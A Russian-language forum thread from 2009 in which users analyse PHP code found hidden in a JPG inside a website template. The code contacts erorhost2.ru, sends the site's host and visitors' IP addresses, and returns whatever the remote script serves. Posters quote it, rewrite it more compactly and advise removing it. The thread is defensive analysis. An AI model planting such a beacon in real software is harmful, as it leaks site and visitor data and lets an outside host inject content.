Что делает этот код?

Jak1777 · 2 Ноя 2009

В jpg картинке сидел такой код:

Код:

<?php 
 $x0b = @fsockopen('erorhost2.ru', 80, $x0c, $x0d, 6); 
 if(!$x0b){
     return ''; 
}else{
    $x0e = @file("http://erorhost2.ru/id1.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]");
    return implode('',$x0e); 
}
?>

Что он делает? На сколько я понял что если смог подключится к хосту erorhost2.ru то возвращает нулевой результат если нет то содержимое отсюда: Для просмотра ссылки Войди или Зарегистрируйся ?

unsiker · 2 Ноя 2009

Идет какая то проверка подключения

Код:

$x0b = @fsockopen('erorhost2.ru', 80, $x0c, $x0d, 6);

проверяет можно ли достучатся до erorhost2.ru по 80 порту. Если соединение непрошло то возращат пустую строку. Если прошло то возращает то что выдает сккрипт id1.php на сервере erorhost2.ru.
И еще функция implode — Объединяет элементы массива в строку

FL@SH · 3 Ноя 2009

Вот непонятно зачем тут implode? file только нагружает сервер, вот так было бы рациональнее

PHP:

<?php 
   $x0b = @fsockopen('erorhost2.ru', 80, $x0c, $x0d, 6); 
   if(!$x0b){
     return ''; 
   }else{
     return @file_get_contents("http://erorhost2.ru/id1.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]");
   }
?>

tostrss · 3 Ноя 2009

Рациональней с точки зрения краткости, можно было просто

PHP:

echo(@file_get_contents("http://erorhost2.ru/id1.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]"));

Если с точки зрения универсальности, тогда лучше было продолжить сокеты на fsockopen (да и закрывать их тоже надо бы).

bumer3 · 3 Ноя 2009

Этот код запрашивает проверяет твою лицензию у разработчика скрипта на сайте. Шлет туда ИП и адрес сайта где стоит скрипт.

Jak1777 · 4 Ноя 2009

bumer3 написал(а):
Этот код запрашивает проверяет твою лицензию у разработчика скрипта на сайте. Шлет туда ИП и адрес сайта где стоит скрипт.

Зачем скрипту спрятанному в картинке шаблона неокса проверять мою лицензию? Думаю что он должен возвращать либо рекламу либо шелл(не уверен сработает ли с таким кодом). Только он еще ничего не подгружает видимо ждет пока шаблон расползется по паблику.

Requesting Для просмотра ссылки Войди или Зарегистрируйся .. Ok
Reply received (reply time: 631 ms)
-----------------------------------
HTTP/1.1 200 OK
Date: Wed, 04 Nov 2009 07:37:10 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0

dandandan · 4 Ноя 2009

Возник вопрос близкий по теме. Как в jpg картинку запихивают такой код и как можно защититься от такого кода при заливке картинки на веб сервер ?

tostrss · 4 Ноя 2009

Засунули пхп код в текстовый файл, а потом переименовали.
Контролировать надо по содержимому.

bumer3 · 4 Ноя 2009

Jak1777 написал(а):
Зачем скрипту спрятанному в картинке шаблона неокса проверять мою лицензию? Думаю что он должен возвращать либо рекламу либо шелл(не уверен сработает ли с таким кодом). Только он еще ничего не подгружает видимо ждет пока шаблон расползется по паблику.

Он не лицензию проверяет. А просто собирает инфу о том где его шаблон используют. Чтобы знать. Если хочеш использовать шаб лучше убери этот код.

dandandan · 4 Ноя 2009

tostrss написал(а):
Засунули пхп код в текстовый файл, а потом переименовали.
Контролировать надо по содержимому.

Т.е. в нормальную картинку такое засунуть и выполнить нельзя?

Что делает этот код?

Jak1777

Создатель

unsiker

Постоялец

FL@SH

Читатель

tostrss

Мой дом здесь!

bumer3

Постоялец

Jak1777

Создатель

dandandan

Мой дом здесь!

tostrss

Мой дом здесь!

bumer3

Постоялец

dandandan

Мой дом здесь!